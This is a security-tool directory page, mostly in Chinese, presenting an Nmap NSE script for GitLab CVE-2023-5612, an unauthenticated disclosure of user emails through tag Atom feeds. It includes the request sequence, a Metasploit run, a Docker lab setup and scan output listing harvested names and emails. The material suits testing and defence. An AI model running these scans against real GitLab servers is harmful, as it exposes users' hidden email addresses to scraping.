Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-5612 — Nmap NSE to check for CVE-2023-5612 | Kitploit
工具/GitHubGitHub/mad3e7cat/cve-2023-5612
OSINT (Open Source Intelligence)ReconnaissanceVulnerability ScannersExploitationInformation GatheringWeb Security
GitHubmad3e7cat/cve-2023-5612

CVE-2023-5612

Nmap NSE to check for CVE-2023-5612

查看仓库
40年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

公开邮件在标签RSS源中的泄露

https://about.gitlab.com/releases/2024/01/25/critical-security-release-gitlab-16-8-1-released/

root@kitploit:~
An issue has been discovered in GitLab affecting all versions before 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1. It was possible to read the user email address via tags feed although the visibility in the user profile has been disabled. This is a medium severity issue (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N, 5.3). It is now mitigated in the latest release and is assigned CVE-2023-5612.

https://nvd.nist.gov/vuln/detail/CVE-2023-5612

root@kitploit:~
An issue has been discovered in GitLab affecting all versions before 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1. It was possible to read the user email address via tags feed although the visibility in the user profile has been disabled.

描述

在GitLab中发现了一个漏洞,允许获取用户的邮箱地址列表(以及名称),即使某些用户拥有隐藏的个人资料。这是因为可以未经身份验证地访问/api/v4/projects端点。对于每个项目,可以获取其web_url,并发送请求到/-/tags?format=atom端点,返回的xml中会包含用户名和邮箱:

root@kitploit:~
...
    <name>test</name>
    <email>[email protected]</email>
...

NSE开发

PoC:

  • https://hackerone.com/reports/2208790
  • https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/gitlab_tags_rss_feed_email_disclosure.rb
  • https://sploitus.com/?query=CVE-2023-5612#exploits

注意:有一个nse脚本声称针对此漏洞,但观察其名称和内容后可知,这是个错误,它与此CVE无关。

算法:

  1. 获取所有可用项目的名称:
root@kitploit:~
GET /api/v4/projects?output_mode=json HTTP/1.1

响应示例:

root@kitploit:~
[{"id":3,"description":null,"name":"project3","name_with_namespace":"test / project3","path":"project3","path_with_namespace":"test/project3","created_at":"2025-09-13T16:39:05.885Z","default_branch":"main","tag_list":[],"topics":[],"ssh_url_to_repo":"ssh://git@localhost:2424/test/project3.git","http_url_to_repo":"http://localhost:8929/test/project3.git","web_url":"http://localhost:8929/test/project3","readme_url":"http://localhost:8929/test/project3/-/blob/main/README.md","forks_count":0,"avatar_url":null,"star_count":0,"last_activity_at":"2025-09-13T16:39:05.885Z","namespace":{"id":4,"name":"test","path":"test","kind":"user","full_path":"test","parent_id":null,"avatar_url":"https://www.gravatar.com/avatar/b642b4217b34b1e8d3bd915fc65c4452?s=80\u0026d=identicon","web_url":"http://localhost:8929/test"}},{"id":2,"description":null,"name":"project2","name_with_namespace":"testgroup / project2","path":"project2","path_with_namespace":"testgroup/project2","created_at":"2025-09-13T16:35:26.979Z","default_branch":"main","tag_list":[],"topics":[],"ssh_url_to_repo":"ssh://git@localhost:2424/testgroup/project2.git","http_url_to_repo":"http://localhost:8929/testgroup/project2.git","web_url":"http://localhost:8929/testgroup/project2","readme_url":"http://localhost:8929/testgroup/project2/-/blob/main/README.md","forks_count":0,"avatar_url":null,"star_count":0,"last_activity_at":"2025-09-13T16:35:26.979Z","namespace":{"id":3,"name":"testgroup","path":"testgroup","kind":"group","full_path":"testgroup","parent_id":null,"avatar_url":null,"web_url":"http://localhost:8929/groups/testgroup"}},{"id":1,"description":null,"name":"test","name_with_namespace":"Administrator / test","path":"test","path_with_namespace":"root/test","created_at":"2025-09-12T15:03:47.319Z","default_branch":"main","tag_list":[],"topics":[],"ssh_url_to_repo":"ssh://git@localhost:2424/root/test.git","http_url_to_repo":"http://localhost:8929/root/test.git","web_url":"http://localhost:8929/root/test","readme_url":"http://localhost:8929/root/test/-/blob/main/README.md","forks_count":0,"avatar_url":null,"star_count":0,"last_activity_at":"2025-09-13T16:19:10.901Z","namespace":{"id":1,"name":"Administrator","path":"root","kind":"user","full_path":"root","parent_id":null,"avatar_url":"https://www.gravatar.com/avatar/e64c7d89f26bd1972efa854d13d7dd61?s=80\u0026d=identicon","web_url":"http://localhost:8929/root"}}]
  1. 对每个项目获取atom-xml格式的标签:
root@kitploit:~
GET /test/project3/-/tags?format=atom HTTP/1.1
GET /root/test/-/tags?format=atom HTTP/1.1

响应示例:

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<feed xmlns="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
<title>project3 tags</title>
<link href="http://127.0.0.1:8929/test/project3/-/tags?format=atom" rel="self" type="application/atom+xml"/>
<link href="http://127.0.0.1:8929/test/project3/-/tags" rel="alternate" type="text/html"/>
<id>http://127.0.0.1:8929/test/project3/-/tags</id>
<entry>
  <id>http://127.0.0.1:8929/test/project3/-/tags/1.0.0</id>
  <link href="http://127.0.0.1:8929/test/project3/-/tags/1.0.0"/>
  <title>1.0.0</title>
  <summary></summary>
  <content type="html"></content>
  <media:thumbnail width="40" height="40" url="https://www.gravatar.com/avatar/b642b4217b34b1e8d3bd915fc65c4452?s=80&amp;d=identicon"/>
  <author>
    <name>test</name>
    <email>[email protected]</email>
  </author>
</entry>
</feed>

在这个文件中,我们可以看到该项目中所有标签作者的name和email字段。攻击者能够揭露这些信息正是漏洞的本质。

成功利用的示例:

root@kitploit:~
# Metasploit
use auxiliary/gather/gitlab_tags_rss_feed_email_disclosure
set RHOSTS 127.0.0.1
set RPORT 8929
run

结果:

root@kitploit:~
auxiliary(gather/gitlab_tags_rss_feed_email_disclosure) > run
[*] Running module against 127.0.0.1
[+] Scraping ALL projects...
[+] name: test
[+] e-mail: [email protected]
[+] name: Administrator
[+] e-mail: [email protected]
[*] Auxiliary module execution completed

NSE测试

测试在GitLab CE 16.5.10上进行

docker-compose.yml

root@kitploit:~
services:
  gitlab:
    image: gitlab/gitlab-ce:16.5.10-ce.0
    container_name: gitlab-ce
    restart: always
    hostname: 'gitlab.example.com'
    environment:
      GITLAB_OMNIBUS_CONFIG: |
        external_url 'http://localhost:8929'
        gitlab_rails['gitlab_shell_ssh_port'] = 2424
    ports:
      - '8929:8929'
      - '443:443'
      - '2424:22'
    volumes:
      - '$GITLAB_HOME/config:/etc/gitlab'
      - '$GITLAB_HOME/logs:/var/log/gitlab'
      - '$GITLAB_HOME/data:/var/opt/gitlab'
    shm_size: '256m'

启动并准备测试环境

  1. 在docker中启动有漏洞的gitlab-ce:
root@kitploit:~
sudo docker compose up
sudo docker exec -it {CONTAINER_ID} grep 'Password:' /etc/gitlab/initial_root_password
# 不要解码显示的base64值,直接按原样使用
# 将root的凭据更改为类似 root:toortoor
  1. 准备环境:
  • 以root身份登录
  • 创建一个项目
  • 以root身份为项目创建一个标签
  • 创建用户test,以test身份登录
  • 以test身份创建一个项目
  • 以test身份为项目创建一个标签
  1. 运行脚本:
root@kitploit:~
# 全量扫描
nmap --script cve-2023-5612 <TARGET> -p <PORT>
nmap --script cve-2023-5612 <TARGET> -p <PORT> --script-args check_mode=full
# 快速扫描
nmap --script cve-2023-5612 <TARGET> -p <PORT> --script-args check_mode=fast

成功利用的示例:

root@kitploit:~
nmap -Pn --script cve-2023-5612 localhost -p 8929 --script-args check_mode=full
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-14 16:39 MSK
####### CVE-2023-5612 #######
[+] Checking target...
[+] Checking for vulnerability...
[+] Projects found:
        http://localhost:8929/test/project3
        http://localhost:8929/testgroup/project2
        http://localhost:8929/root/test
[+] Results:
        email,username,project_url
        [email protected],test,http://localhost:8929/test/project3
        [email protected],Administrator,http://localhost:8929/testgroup/project2
        [email protected],Administrator,http://localhost:8929/root/test
[+] Writing results to ./gitlab_enumerated.csv...
[+] Done
#############################

Nmap scan report for localhost (127.0.0.1)
Host is up (0.00013s latency).
Other addresses for localhost (not scanned): ::1

PORT     STATE SERVICE
8929/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 1.64 seconds
# 查看保存的结果,仅显示邮箱
tail -n +2 gitlab_enumerated.csv | cut -d "," -f 1| sort -u
[email protected]
[email protected]

以非GitLab为例的利用失败示例:

root@kitploit:~
nmap --script cve-2023-5612 localhost -p 1337
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-14 06:35 MSK
####### CVE-2023-5612 #######
[+] Checking target...
[-] Error: The target is not a GitLab instance. Exiting...
#############################
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00012s latency).
Other addresses for localhost (not scanned): ::1

PORT     STATE SERVICE
1337/tcp open  waste

Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds

针对实际非脆弱目标的利用示例:

root@kitploit:~
nmap -Pn -p 7180 --script cve-2023-5612 <IP-addr> --script-args check_mode=fast
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-14 16:37 MSK
####### CVE-2023-5612 #######
[+] Checking target...
[+] Checking for vulnerability...
[-] Projects list seems to be empty or unavailable
[-] Target is NOT vulnerable
#############################

链接

  • https://vuldb.com/?id.252096
  • https://hackerone.com/reports/2208790
  • https://www.rapid7.com/db/modules/auxiliary/gather/gitlab_tags_rss_feed_email_disclosure/
  • https://scm.cms.hu-berlin.de/safeguarding/cvelistV5/-/blob/cve_2025-05-08_0800Z/cves/2023/5xxx/CVE-2023-5612.json
  • https://docs.gitlab.com/install/docker/installation/
  • https://hub.docker.com/r/gitlab/gitlab-ce/tags/?page=4
  • https://hub.docker.com/layers/gitlab/gitlab-ce/16.5.10-ce.0/images/sha256-a8a3b7904bb5f92b7fd55e924d65c08aac1999ba5a2670f17c00472918ae6f42
  • https://cve.akaoma.com/cve-2023-5612
下载工具